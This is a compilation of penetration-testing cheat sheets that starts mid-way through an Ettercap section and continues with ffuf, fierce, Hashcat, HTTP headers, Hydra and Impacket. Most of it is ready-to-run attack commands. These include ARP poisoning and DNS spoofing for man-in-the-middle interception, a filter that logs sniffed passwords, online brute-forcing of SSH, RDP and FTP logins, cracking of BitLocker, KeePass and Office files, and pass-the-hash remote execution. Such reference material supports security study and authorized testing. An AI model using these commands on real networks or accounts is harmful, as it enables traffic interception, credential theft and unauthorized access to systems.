- /192.168.1.0/24// - Subnet

- //80 - All hosts on port 80

- /192.168.1.1//21,22,23 - Specific ports

Common Options

| Option | Description |

|---|---|

| -i <iface> | Network interface |

| -T | Text mode |

| -G | GTK GUI mode |

| -M <method> | MITM attack method |

| -P <plugin> | Activate plugin |

| -F <file> | Load filter from file |

| -w <file> | Write pcap file |

| -r <file> | Read from pcap file |

| -q | Quiet mode (no packet content) |

| -s <cmd> | Execute command at startup |

| -L <file> | Log all traffic to file |

ARP Poisoning

# Basic ARP poisoning (MITM between target and gateway)

ettercap -T -q -i eth0 -M arp:remote /192.168.1.100// /192.168.1.1//

# ARP poison entire subnet

ettercap -T -q -i eth0 -M arp:remote /// ///

# ARP poisoning with GUI

ettercap -G -i eth0 -M arp:remote /192.168.1.100// /192.168.1.1//

# One-way ARP poisoning

ettercap -T -q -i eth0 -M arp:oneway /192.168.1.100// /192.168.1.1//

DNS Spoofing

Step 1: Edit /etc/ettercap/etter.dns

# Redirect domain to attacker IP

example.com A 192.168.1.50

*.example.com A 192.168.1.50

# Redirect specific subdomain

mail.target.com A 192.168.1.50

Step 2: Run Ettercap with DNS Plugin

# DNS spoofing with ARP poisoning

ettercap -T -q -i eth0 -P dns_spoof -M arp:remote /192.168.1.100// /192.168.1.1//

# GUI mode

ettercap -G -i eth0 -P dns_spoof -M arp:remote /192.168.1.100// /192.168.1.1//

MITM Attack Methods

# ARP poisoning

ettercap -T -M arp:remote /target1// /target2//

# ICMP redirect

ettercap -T -M icmp:00:11:22:33:44:55/192.168.1.1

# DHCP spoofing

ettercap -T -M dhcp:192.168.1.100-200/255.255.255.0/192.168.1.1

# Port stealing

ettercap -T -M port /target1// /target2//

# NDP poisoning (IPv6)

ettercap -T -M ndp:remote /target1// /target2//

Sniffing Modes

# Unified sniffing (single interface)

ettercap -T -i eth0

# Bridged sniffing (two interfaces)

ettercap -T -i eth0 -B eth1

# Read from pcap file

ettercap -T -r capture.pcap

# Write to pcap file

ettercap -T -i eth0 -w output.pcap

Plugins

# List available plugins

ettercap -T -P list

# Common plugins

ettercap -T -P dns_spoof -M arp:remote /// ///

ettercap -T -P remote_browser -M arp:remote /// ///

ettercap -T -P find_conn -M arp:remote /// ///

ettercap -T -P finger -M arp:remote /// ///

| Plugin | Description |

|---|---|

| dns_spoof | DNS spoofing |

| remote_browser | Send visited URLs to browser |

| find_conn | Find connections |

| finger | OS fingerprinting |

| gw_discover | Find gateway |

| search_promisc | Find promiscuous NICs |

| sslstrip | Strip SSL (legacy) |

| autoadd | Auto add new hosts |

Filters

Create a Filter (example.filter)

# Log packets containing a specific string

if (ip.proto == TCP && tcp.dst == 80) {

if (search(DATA.data, "password")) {

log(DATA.data, "/tmp/passwords.log");

}

}

# Replace content

if (ip.proto == TCP && tcp.dst == 80) {

if (search(DATA.data, "Accept-Encoding")) {

replace("Accept-Encoding", "Accept-Nothing!");

}

}

# Drop packets

if (ip.src == '192.168.1.100') {

drop();

msg("Packet dropped\n");

}

Compile and Use Filter

# Compile filter

etterfilter example.filter -o example.ef

# Use compiled filter

ettercap -T -q -i eth0 -F example.ef -M arp:remote /// ///

Host Discovery

# Scan for hosts

ettercap -T -i eth0

# In interactive mode, press:

# 'h' - show help

# 'l' - print the hosts list

# 's' - print interface statistics

Logging

# Log to file

ettercap -T -i eth0 -L logfile

# Creates logfile.eci (connection info) and logfile.ecp (packets)

# View logs

etterlog logfile.eci

etterlog -p logfile.ecp

Configuration Files

| File | Purpose |

|---|---|

| /etc/ettercap/etter.conf | Main configuration |

| /etc/ettercap/etter.dns | DNS spoofing entries |

| /etc/ettercap/etter.filter | Example filters |

Important etter.conf Settings

# Enable traffic redirection, used for SSL dissection (uncomment these)

# Linux

redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

# Set UID/GID to run as non-root

ec_uid = 65534

ec_gid = 65534

Interactive Commands

| Key | Action |

|---|---|

| h | Help |

| q | Quit |

| p | Activate a plugin |

| P | Activate a plugin (same as p) |

| l | List hosts |

| s | Show interface statistics |

| o | Show profiles |

| c | Show connections |

| SPACE | Stop/continue printing packets |

Common Attack Scenarios

Credential Sniffing

ettercap -T -q -i eth0 -M arp:remote /victim// /gateway//

Session Hijacking

ettercap -T -q -i eth0 -M arp:remote -P remote_browser /victim// /gateway//

SSL Stripping (Legacy)

# Requires sslstrip or similar tool running

ettercap -T -q -i eth0 -M arp:remote /victim// /gateway//

Countermeasures Detection

# Detect other sniffers

ettercap -T -P search_promisc

# Detect ARP spoofing

arpwatch

FFuf Cheatsheet

Basic Commands

| Command | Description |

|---|---|

| ffuf -h | Show ffuf help |

Fuzzing Types

Directory Fuzzing

ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ

Extension Fuzzing

ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/indexFUZZ

Page Fuzzing

ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/blog/FUZZ.php

Recursive Fuzzing

ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ -recursion -recursion-depth 1 -e .php -v

Sub-domain Fuzzing

ffuf -w wordlist.txt:FUZZ -u https://FUZZ.hackthebox.eu/

VHost Fuzzing

ffuf -w wordlist.txt:FUZZ -u http://academy.htb:PORT/ -H 'Host: FUZZ.academy.htb' -fs xxx

Parameter Fuzzing - GET

ffuf -w wordlist.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php?FUZZ=key -fs xxx

Parameter Fuzzing - POST

ffuf -w wordlist.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'FUZZ=key' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx

Value Fuzzing

ffuf -w ids.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'id=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx
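The -fs xxx placeholder in these commands is the size of the response the server returns for any non-matching word, such as the default vhost page. The Python sketch below shows that reasoning, assuming you already have (word, response size) pairs from an unfiltered run; the sample values are made up. The most common size is treated as the baseline and filtered out, which is what -fs does for you.

```python
from collections import Counter

def filter_baseline(results):
    """Drop results whose size matches the most common (baseline) response size."""
    if not results:
        return []
    baseline, _count = Counter(size for _word, size in results).most_common(1)[0]
    return [(word, size) for word, size in results if size != baseline]

# Hypothetical unfiltered vhost results: (word, response size in bytes)
RESULTS = [("www", 986), ("mail", 986), ("admin", 3512), ("dev", 986), ("test", 986)]
```

Here the baseline is 986 bytes, so the equivalent ffuf run would use -fs 986 and report only admin.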

Wordlists

| Type | Path |

|---|---|

| Directory/Page | /opt/useful/seclists/Discovery/Web-Content/directory-list-2.3-small.txt |

| Extensions | /opt/useful/seclists/Discovery/Web-Content/web-extensions.txt |

| Domain | /opt/useful/seclists/Discovery/DNS/subdomains-top1million-5000.txt |

| Parameters | /opt/useful/seclists/Discovery/Web-Content/burp-parameter-names.txt |

Misc

Add DNS Entry

sudo sh -c 'echo "SERVER_IP academy.htb" >> /etc/hosts'

Create Sequence Wordlist

for i in $(seq 1 1000); do echo $i >> ids.txt; done

curl with POST

curl http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'id=key' -H 'Content-Type: application/x-www-form-urlencoded'

fierce

Fierce is a DNS reconnaissance tool used for locating non-contiguous IP space and hostnames against specified domains. It’s particularly useful for finding targets both inside and outside a corporate network.

Installation

# Kali/Debian

sudo apt install fierce

# Python pip

pip install fierce

Basic Syntax

fierce --domain <target_domain> [options]

Basic Usage

# Basic domain enumeration

fierce --domain example.com

# With verbose output

fierce --domain example.com --verbose

# Specify DNS server

fierce --domain example.com --dns-servers 8.8.8.8

Common Options

| Option | Description |

|---|---|

| --domain | Target domain to scan |

| --dns-servers | DNS servers to use (space-separated) |

| --subdomain-file | Custom wordlist for subdomain brute-forcing |

| --traverse | Scan IPs near discovered hosts |

| --search | Search filter for --traverse |

| --range | Scan IP range (CIDR notation) |

| --delay | Delay between lookups (seconds) |

| --threads | Number of threads to use |

| --wide | Scan entire class C of discovered hosts |

| --connect | Attempt HTTP connection to discovered hosts |

Zone Transfer Attempts

# Fierce automatically attempts zone transfers

fierce --domain example.com

# Output shows:

# NS: ns1.example.com. ns2.example.com.

# SOA: ns1.example.com.

# Zone: success/failure

Subdomain Brute-Forcing

# Using default wordlist

fierce --domain example.com

# Using custom wordlist

fierce --domain example.com --subdomain-file /path/to/wordlist.txt

# Using SecLists wordlist

fierce --domain example.com --subdomain-file /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt

IP Range Scanning

# Scan specific IP range

fierce --range 192.168.1.0/24

# Scan range with DNS resolution

fierce --range 10.0.0.0/24 --dns-servers 10.0.0.1

Traversal Mode

# Scan adjacent IPs of discovered hosts

fierce --domain example.com --traverse 10

# With search filter

fierce --domain example.com --traverse 5 --search "example"
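--traverse N looks up addresses near each discovered record without leaving its class C (/24). The rough Python sketch below shows which addresses that covers, assuming N addresses on each side. The helper name is hypothetical, and fierce's own implementation may differ in detail.

```python
import ipaddress

def traverse_neighbors(ip: str, n: int):
    """Addresses within n of ip (inclusive), clamped to ip's /24."""
    addr = ipaddress.IPv4Address(ip)
    class_c = ipaddress.IPv4Network(f"{addr}/24", strict=False)
    neighbors = []
    for offset in range(-n, n + 1):
        try:
            candidate = addr + offset
        except ValueError:
            continue  # ran past 0.0.0.0 or 255.255.255.255
        if candidate in class_c:
            neighbors.append(str(candidate))
    return neighbors
```

For a record at 192.168.1.1 with N=3, addresses below 192.168.1.0 are skipped rather than spilling into 192.168.0.0/24.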

Wide Scan

# Scan entire class C networks of discovered hosts

fierce --domain example.com --wide

Using Multiple DNS Servers

# Use multiple DNS servers

fierce --domain example.com --dns-servers 8.8.8.8 8.8.4.4 1.1.1.1

# Use internal DNS servers

fierce --domain internal.corp --dns-servers 10.0.0.53 10.0.0.54

Performance Tuning

# Add delay between requests

fierce --domain example.com --delay 0.5

# Multi-threaded scanning

fierce --domain example.com --threads 10

Output Examples

Successful Zone Transfer

NS: ns1.example.com. ns2.example.com.

SOA: ns1.example.com. (192.168.1.10)

Zone: success

{<DNS name @>: '@ 7200 IN SOA ns1.example.com. admin.example.com. ...'

<DNS name www>: 'www 7200 IN A 192.168.1.20'

<DNS name mail>: 'mail 7200 IN A 192.168.1.30'

<DNS name ftp>: 'ftp 7200 IN A 192.168.1.40'

...

}

Subdomain Enumeration

Found: www.example.com (192.168.1.20)

Found: mail.example.com (192.168.1.30)

Found: vpn.example.com (192.168.1.50)

Found: admin.example.com (192.168.1.60)

Integration with Other Tools

# Save output for further processing

fierce --domain example.com > fierce_output.txt

# Extract IPs for nmap

fierce --domain example.com 2>/dev/null | grep -oE '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' | sort -u > ips.txt

nmap -iL ips.txt -sV

# Pipe to other tools

fierce --domain example.com | tee results.txt

Common Wordlists for Subdomain Brute-Forcing

| Wordlist | Location |

|---|---|

| Default | Built into fierce |

| SecLists subdomains | /usr/share/seclists/Discovery/DNS/subdomains-top1million-*.txt |

| SecLists fierce | /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt |

| Amass default | /usr/share/amass/wordlists/ |

Comparison with Similar Tools

| Tool | Use Case |

|---|---|

| fierce | Quick DNS recon, zone transfers, subdomain enum |

| subfinder | Passive subdomain enumeration |

| amass | Comprehensive subdomain enumeration |

| dnsrecon | Detailed DNS enumeration |

| dnsenum | DNS enumeration with Google scraping |

Example Workflow

# Step 1: Initial fierce scan

fierce --domain target.com

# Step 2: If zone transfer fails, brute-force subdomains

fierce --domain target.com --subdomain-file /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt

# Step 3: Scan adjacent IPs

fierce --domain target.com --traverse 5

# Step 4: Check HTTP services on discovered hosts

fierce --domain target.com --connect

Troubleshooting

# If no results, try different DNS servers

fierce --domain example.com --dns-servers 8.8.8.8

# Increase delay if getting rate limited

fierce --domain example.com --delay 1

# Use verbose mode for debugging

fierce --domain example.com --verbose

Notes

- Fierce first attempts zone transfers on all discovered name servers

- If zone transfer fails, it falls back to subdomain brute-forcing

- The --traverse option is useful for finding additional hosts in the same network

- Always have permission before scanning

- DNS enumeration may be logged

Hashcat Cheatsheet

Basic Syntax

hashcat -a <attack_mode> -m <hash_type> <hashes> [wordlist, rule, mask, ...]

| Option | Description |

|---|---|

| -a | Attack mode |

| -m | Hash type ID |

| -r | Rules file |

| -o | Output file for cracked hashes |

| --show | Show previously cracked hashes |

| --force | Ignore warnings |

Attack Modes (-a)

| Mode | Name | Description |

|---|---|---|

| 0 | Straight/Dictionary | Wordlist-based attack |

| 1 | Combination | Combines words from two wordlists |

| 3 | Brute-force/Mask | Uses masks to define keyspace |

| 6 | Hybrid Wordlist + Mask | Appends mask to wordlist entries |

| 7 | Hybrid Mask + Wordlist | Prepends mask to wordlist entries |

Common Hash Types (-m)

| ID | Hash Type |

|---|---|

| 0 | MD5 |

| 100 | SHA1 |

| 500 | MD5 Crypt / Cisco-IOS / FreeBSD MD5 |

| 900 | MD4 |

| 1000 | NTLM |

| 1300 | SHA2-224 |

| 1400 | SHA2-256 |

| 1700 | SHA2-512 |

| 1800 | SHA-512 Crypt (Unix) |

| 3000 | LM |

| 3200 | bcrypt |

| 5600 | NetNTLMv2 |

| 13100 | Kerberos 5 TGS-REP |

| 18200 | Kerberos 5 AS-REP |

| 22000 | WPA-PBKDF2-PMKID+EAPOL |

Full list: hashcat --help or hashcat.net/wiki/doku.php?id=example_hashes

Mask Attack Character Sets

| Symbol | Charset |

|---|---|

| ?l | abcdefghijklmnopqrstuvwxyz |

| ?u | ABCDEFGHIJKLMNOPQRSTUVWXYZ |

| ?d | 0123456789 |

| ?h | 0123456789abcdef |

| ?H | 0123456789ABCDEF |

| ?s | Special characters (space, punctuation) |

| ?a | ?l?u?d?s (all printable) |

| ?b | 0x00 - 0xff (all bytes) |

Custom charsets: -1, -2, -3, -4 → Reference with ?1, ?2, ?3, ?4
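Before you run a mask, you can check whether it is feasible by multiplying the charset size at each position. Below is a minimal Python sketch. It assumes `?s` is a space plus the 32 ASCII punctuation characters (33 in total, which gives `?a` 95), and that custom charsets only mix built-ins and literals. `mask_keyspace` and the other helper names are hypothetical and not part of hashcat.

```python
import string

# Built-in charsets from the table above.
BUILTIN = {
    "l": string.ascii_lowercase,
    "u": string.ascii_uppercase,
    "d": string.digits,
    "h": "0123456789abcdef",
    "H": "0123456789ABCDEF",
    "s": " " + string.punctuation,  # space plus the 32 ASCII punctuation characters
}
BUILTIN["a"] = BUILTIN["l"] + BUILTIN["u"] + BUILTIN["d"] + BUILTIN["s"]
BUILTIN["b"] = "".join(chr(i) for i in range(256))


def tokens(spec):
    """Split a mask or charset definition into '?x' placeholders and literal characters."""
    i = 0
    while i < len(spec):
        if spec[i] == "?":
            if i + 1 == len(spec):
                raise ValueError("dangling '?' at end of mask")
            yield spec[i : i + 2]
            i += 2
        else:
            yield spec[i]
            i += 1


def charset(token, custom):
    """Return the set of characters one mask position can take."""
    if len(token) == 1:
        return {token}  # literal character
    key = token[1]
    if key == "?":
        return {"?"}  # '??' is a literal question mark
    if key in BUILTIN:
        return set(BUILTIN[key])
    if key in custom:
        # Custom charsets (-1 .. -4) may combine built-ins and literals.
        return set().union(*(charset(t, {}) for t in tokens(custom[key])))
    raise ValueError(f"unknown placeholder {token!r}")


def mask_keyspace(mask, custom=None):
    """Total number of candidates a fixed-length mask produces."""
    custom = custom or {}
    total = 1
    for token in tokens(mask):
        total *= len(charset(token, custom))
    return total
```

For example, `mask_keyspace("?l?l?l?l?l?l?d?d")` is 26^6 × 10^2 = 30,891,577,600 candidates. `mask_keyspace("?1?1?1?1?d?d?d?d", {"1": "?l?u"})` mirrors the custom-charset command in the Quick Reference below. hashcat's own `--keyspace` figure can be smaller, because it reports only the base-loop keyspace it uses to split work.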

Quick Reference Commands

Dictionary Attack

hashcat -a 0 -m 0 hash.txt /usr/share/wordlists/rockyou.txt

Dictionary Attack with Rules

hashcat -a 0 -m 0 hash.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

Mask Attack (8 char: 6 lowercase + 2 digits)

hashcat -a 3 -m 0 hash.txt ?l?l?l?l?l?l?d?d

Mask Attack with Custom Charset

hashcat -a 3 -m 0 hash.txt -1 ?l?u ?1?1?1?1?d?d?d?d

Hybrid Attack (wordlist + mask)

hashcat -a 6 -m 0 hash.txt /usr/share/wordlists/rockyou.txt ?d?d?d

Show Cracked Hashes

hashcat -m 0 hash.txt --show

Identify Hash Type

hashid -m '<hash_string>'

Common Rule Files

| Rule File | Description |

|---|---|

| best64.rule | 64 standard password modifications |

| rockyou-30000.rule | Large ruleset based on rockyou patterns |

| dive.rule | Comprehensive rule set |

| d3ad0ne.rule | Popular community ruleset |

| leetspeak.rule | Leet speak substitutions |

| toggles1-5.rule | Case toggling rules |

Location: /usr/share/hashcat/rules/

Useful Options

| Option | Description |

|---|---|

| --status | Enable automatic status updates |

| --status-timer=N | Set status update interval (seconds) |

| -w 3 | Workload profile (1=low, 2=default, 3=high, 4=nightmare) |

| --increment | Enable mask increment mode |

| --increment-min=N | Start mask length |

| --increment-max=N | End mask length |

| -O | Enable optimized kernels (faster, but limits password length) |

| --username | Ignore username in hash file |

| --potfile-disable | Don’t write to potfile |

Cracking Protected Files & Archives

Common Hash Modes for Files

| ID | Type |

|---|---|

| 9400-9600 | MS Office 2007-2013 |

| 10400-10700 | PDF |

| 13600 | WinZip |

| 17200-17225 | PKZIP |

| 22100 | BitLocker |

| 13400 | KeePass |

| 6211-6243 | TrueCrypt |

| 13711-13723 | VeraCrypt |

Crack BitLocker Drive

# Extract hash with bitlocker2john (from JtR)

bitlocker2john -i Backup.vhd > backup.hashes

grep "bitlocker\$0" backup.hashes > backup.hash

# Crack with hashcat

hashcat -a 0 -m 22100 backup.hash /usr/share/wordlists/rockyou.txt

Crack ZIP File (PKZIP)

# Extract hash with zip2john (from JtR) and keep only the hash field (zip2john wraps it in file names)

zip2john protected.zip | cut -d ':' -f 2 > zip.hash

# Crack with hashcat (mode depends on ZIP type)

hashcat -a 0 -m 17200 zip.hash /usr/share/wordlists/rockyou.txt

Crack MS Office Document

# Extract hash with office2john (from JtR)

office2john.py document.docx > office.hash

# Crack with hashcat (mode depends on Office version; --username skips the file-name prefix added by office2john)

hashcat -a 0 -m 9600 --username office.hash /usr/share/wordlists/rockyou.txt

Crack PDF

# Extract hash with pdf2john (from JtR)

pdf2john.py document.pdf > pdf.hash

# Crack with hashcat (--username skips the file-name prefix added by pdf2john)

hashcat -a 0 -m 10500 --username pdf.hash /usr/share/wordlists/rockyou.txt

Crack KeePass Database

# Extract hash with keepass2john (from JtR)

keepass2john database.kdbx > keepass.hash

# Crack with hashcat (--username skips the database-name prefix added by keepass2john)

hashcat -a 0 -m 13400 --username keepass.hash /usr/share/wordlists/rockyou.txt

standard http headers

| Header | Example | Description |

|---|---|---|

| A-IM | A-IM: feed | Instance manipulations that are acceptable in the response. Defined in RFC 3229 |

| Accept | Accept: application/json | The media type/types acceptable |

| Accept-Charset | Accept-Charset: utf-8 | The charset acceptable |

| Accept-Encoding | Accept-Encoding: gzip, deflate | List of acceptable encodings |

| Accept-Language | Accept-Language: en-US | List of acceptable languages |

| Accept-Datetime | Accept-Datetime: Thu, 31 May 2007 20:35:00 GMT | Request a past version of the resource prior to the datetime passed |

| Access-Control-Request-Method | Access-Control-Request-Method: GET | Used in a CORS request |

| Access-Control-Request-Headers | Access-Control-Request-Headers: origin, x-requested-with, accept | Used in a CORS request |

| Authorization | Authorization: Basic 34i3j4iom2323== | HTTP basic authentication credentials |

| Cache-Control | Cache-Control: no-cache | Set the caching rules |

| Connection | Connection: keep-alive | Control options for the current connection. Accepts keep-alive and close. Deprecated in HTTP/2 |

| Content-Length | Content-Length: 348 | The length of the request body in bytes |

| Content-Type | Content-Type: application/x-www-form-urlencoded | The content type of the body of the request (used in POST and PUT requests) |

| Cookie | Cookie: name=value | Cookies previously set by the server with Set-Cookie (see https://flaviocopes.com/cookies/) |

| Date | Date: Tue, 15 Nov 1994 08:12:31 GMT | The date and time that the request was sent |

| Expect | Expect: 100-continue | Typically sent with a large request body. The server replies 100 Continue if it will accept the request, or 417 Expectation Failed if it will not |

| Forwarded | Forwarded: for=192.0.2.60; proto=http; by=203.0.113.43 | Discloses original information about a client connecting to a web server through an HTTP proxy (RFC 7239). Exposes privacy-sensitive information by design |

| From | From: user@example.com | The email address of the user making the request. Meant to be used, for example, to indicate a contact email for bots. |

| Host | Host: flaviocopes.com | The domain name of the server (used to determine the target server with virtual hosting) and the TCP port on which the server is listening. If the port is omitted, the scheme's default is assumed (80 for HTTP, 443 for HTTPS). Mandatory in HTTP/1.1 requests |

| If-Match | If-Match: "737060cd8c284d8582d" | Given one or more ETags, the server should only perform the request if the current resource matches one of those ETags. Mainly used in PUT requests to update a resource only if it has not been modified since the user last fetched it |

| If-Modified-Since | If-Modified-Since: Sat, 29 Oct 1994 19:43:31 GMT | Allows the server to return a 304 Not Modified status if the content is unchanged since that date |

| If-None-Match | If-None-Match: "737060cd882f209582d" | Allows the server to return a 304 Not Modified status if the resource still matches one of the listed ETags (content unchanged). Opposite of If-Match |

| If-Range | If-Range: "737060cd8c9582d" | Used to resume downloads: returns the requested range (206 Partial Content) if the condition (ETag or date) still matches, or the full resource if not |

| If-Unmodified-Since | If-Unmodified-Since: Sat, 29 Oct 1994 19:43:31 GMT | Only send the response if the entity has not been modified since the specified time |

| Max-Forwards | Max-Forwards: 10 | Limit the number of times the message can be forwarded through proxies or gateways |

| Origin | Origin: http://mydomain.com | Send the current domain to perform a CORS request, used in an OPTIONS HTTP request (to ask the server for Access-Control- response headers) |

| Pragma | Pragma: no-cache | Used for backwards compatibility with HTTP/1.0 caches |

| Proxy-Authorization | Proxy-Authorization: Basic 2323jiojioIJOIOJIJ== | Authorization credentials for connecting to a proxy |

| Range | Range: bytes=500-999 | Request only a specific part of a resource |

| Referer | Referer: https://flaviocopes.com | The address of the previous web page from which a link to the currently requested page was followed. |

| TE | TE: trailers, deflate | Specify the transfer codings the client can accept. Accepted values: compress, deflate, gzip, trailers. Only trailers is supported in HTTP/2 |

| User-Agent | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36 | The string that identifies the user agent |

| Upgrade | Upgrade: h2c, HTTPS/1.3, IRC/6.9, RTA/x11, websocket | Ask the server to upgrade to another protocol. Deprecated in HTTP/2 |

| Via | Via: 1.0 fred, 1.1 example.com (Apache/1.1) | Informs the server of proxies through which the request was sent |

| Warning | Warning: 199 Miscellaneous warning | A general warning about possible problems with the status of the message. Accepts a special range of values. |

| DNT | DNT: 1 | If enabled, asks servers to not track the user |

| X-CSRF-Token | X-CSRF-Token: | Used to prevent CSRF |
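The If-None-Match / 304 exchange described in the table can be sketched as server-side logic. This is a minimal Python illustration, not any particular web server's code. It assumes no ETag contains a comma, and it uses weak comparison, where `W/"abc"` matches `"abc"`, as If-None-Match requires. The function names are hypothetical.

```python
def parse_etags(header):
    """Split an If-None-Match value into entity tags (assumes no tag contains a comma)."""
    return [tag.strip() for tag in header.split(",") if tag.strip()]


def strip_weak(tag):
    """Drop the W/ weak-validator prefix, if present."""
    return tag[2:] if tag.startswith("W/") else tag


def conditional_get_status(current_etag, if_none_match=None):
    """Status a server would send for a GET/HEAD, given the request's If-None-Match header."""
    if if_none_match is None:
        return 200  # unconditional request: send the full resource
    tags = parse_etags(if_none_match)
    # If-None-Match uses weak comparison, so the W/ prefix is ignored on both sides.
    if "*" in tags or any(strip_weak(t) == strip_weak(current_etag) for t in tags):
        return 304  # the client's cached copy is still current, so no body is sent
    return 200
```

A client that cached a response with `ETag: "737060cd882f209582d"` sends that value back in If-None-Match. It gets a 304 until the resource changes.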

Cache-Control

The Cache-Control header is used to specify directives for caching mechanisms in both requests and responses. Here are some common directives that can be used with the Cache-Control header:

| Directive | Description |

|---|---|

| no-cache | Forces caches to submit the request to the origin server for validation before releasing a cached copy. |

| no-store | Instructs caches not to store any part of the request or response. |

| public | Indicates that the response may be cached by any cache, even if it would normally be non-cacheable or cacheable only in a private cache. |

| private | Indicates that the response is intended for a single user and should not be stored by shared caches. |

| max-age=<seconds> | Specifies the maximum amount of time (in seconds) a resource is considered fresh. |

| stale-while-revalidate=<seconds> | Allows a cache to serve a stale response for up to this many seconds while it revalidates it in the background. |
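How these directives combine can be shown with a rough freshness check. Below is a minimal Python sketch: a stored response may be reused without revalidation only while its age is below max-age, and never under no-store or no-cache. It deliberately ignores Expires, s-maxage, heuristic freshness and stale-while-revalidate. The helper names are hypothetical.

```python
def parse_cache_control(header):
    """Parse 'no-cache, max-age=300' into {'no-cache': None, 'max-age': '300'}."""
    directives = {}
    for part in header.split(","):
        part = part.strip()
        if not part:
            continue
        name, sep, value = part.partition("=")
        directives[name.strip().lower()] = value.strip().strip('"') if sep else None
    return directives


def can_reuse(header, age_seconds):
    """Rough check: may a cache serve a stored response of this age without revalidating?"""
    d = parse_cache_control(header)
    if "no-store" in d or "no-cache" in d:
        return False  # no-store: never stored; no-cache: must revalidate first
    max_age = d.get("max-age")
    if max_age is None or not max_age.isdigit():
        return False  # this sketch ignores Expires and heuristic freshness
    return age_seconds < int(max_age)  # fresh while age < max-age
```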

Hydra Cheatsheet

Basic Syntax

hydra [login_options] [password_options] [attack_options] [service_options] service://server

Login Options

| Option | Description | Example |

|---|---|---|

| -l LOGIN | Single username | hydra -l admin ... |

| -L FILE | Username list file | hydra -L usernames.txt ... |

Password Options

| Option | Description | Example |

|---|---|---|

| -p PASS | Single password | hydra -p password123 ... |

| -P FILE | Password list file | hydra -P passwords.txt ... |

| -x MIN:MAX:CHARSET | Generate passwords | hydra -x 6:8:aA1 ... |
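In a `-x` charset, `a` stands for lowercase letters, `A` for uppercase letters and `1` for digits. Any other character is taken literally. Below is a minimal Python sketch that counts how many candidates a `-x` spec generates. It assumes duplicate characters in the charset are counted once, which may not match hydra's internals exactly. `x_keyspace` is a hypothetical helper.

```python
import string

# Hydra's -x charset symbols; any other character is added literally.
SYMBOLS = {"a": string.ascii_lowercase, "A": string.ascii_uppercase, "1": string.digits}


def x_keyspace(spec):
    """Count candidates for a hydra -x MIN:MAX:CHARSET spec (duplicate characters counted once)."""
    min_len, max_len, chars = spec.split(":", 2)
    alphabet = set()
    for ch in chars:
        alphabet.update(SYMBOLS.get(ch, ch))
    n = len(alphabet)
    return sum(n**length for length in range(int(min_len), int(max_len) + 1))
```

`x_keyspace("6:8:aA1")` is 62^6 + 62^7 + 62^8, roughly 2.2 × 10^14 candidates. That is far more than an online service such as RDP can realistically be tested against, so keep `-x` ranges short.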

Attack Options

| Option | Description | Example |

|---|---|---|

| -t TASKS | Number of parallel tasks (threads) | hydra -t 4 ... |

| -f | Stop after first successful login | hydra -f ... |

| -s PORT | Specify non-default port | hydra -s 2222 ... |

| -v | Verbose output | hydra -v ... |

| -V | Show each login/password attempt | hydra -V ... |

Common Services

| Service | Protocol | Description | Example |

|---|---|---|---|

| ftp | FTP | File Transfer Protocol | hydra -l admin -P passwords.txt ftp://192.168.1.100 |

| ssh | SSH | Secure Shell | hydra -l root -P passwords.txt ssh://192.168.1.100 |

| http-get | HTTP GET | Web login (GET) | hydra -l admin -P passwords.txt http-get://example.com/login |

| http-post-form | HTTP POST | Web form login (POST) | hydra -l admin -P passwords.txt 192.168.1.100 http-post-form "/login.php:user=^USER^&pass=^PASS^:F=incorrect" |

| smtp | SMTP | Email sending | hydra -l admin -P passwords.txt smtp://mail.server.com |

| pop3 | POP3 | Email retrieval | hydra -l user@example.com -P passwords.txt pop3://mail.server.com |

| imap | IMAP | Remote email access | hydra -l user@example.com -P passwords.txt imap://mail.server.com |

| rdp | RDP | Remote Desktop Protocol | hydra -l administrator -P passwords.txt rdp://192.168.1.100 |

| telnet | Telnet | Remote terminal | hydra -l admin -P passwords.txt telnet://192.168.1.100 |

| mysql | MySQL | Database | hydra -l root -P passwords.txt mysql://192.168.1.100 |

| postgres | PostgreSQL | Database | hydra -l postgres -P passwords.txt postgres://192.168.1.100 |

Useful Examples

SSH Brute Force

hydra -l root -P /path/to/passwords.txt -t 4 ssh://192.168.1.100

FTP Brute Force

hydra -L usernames.txt -P passwords.txt ftp://192.168.1.100

HTTP POST Form Attack

hydra -l admin -P passwords.txt 192.168.1.100 http-post-form "/login.php:user=^USER^&pass=^PASS^:F=incorrect"

RDP with Password Generation

hydra -l administrator -x 6:8:aA1 rdp://192.168.1.100

SSH on Non-Default Port

hydra -l admin -P passwords.txt -s 2222 ssh://192.168.1.100

Stop After First Success

hydra -l admin -P passwords.txt -f ssh://192.168.1.100

Verbose Output

hydra -l admin -P passwords.txt -v ssh://192.168.1.100

RDP with Custom Character Set

hydra -l administrator -x 6:8:abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 rdp://192.168.1.100

Impacket Cheatsheet

Collection of Python tools for working with network protocols (SMB, MSRPC, etc.).

Authentication Format

All tools use the same authentication format:

[[domain/]username[:password]@]<target>

Examples:

administrator:Password123@10.10.10.10

DOMAIN/admin:Password123@10.10.10.10

admin@10.10.10.10 (prompts for password)

Pass-the-Hash

Use -hashes with format LMHASH:NTHASH:

impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 admin@10.10.10.10

impacket-psexec

Remote command execution using RemComSvc.

Interactive Shell

impacket-psexec administrator:'Password123'@10.10.10.10

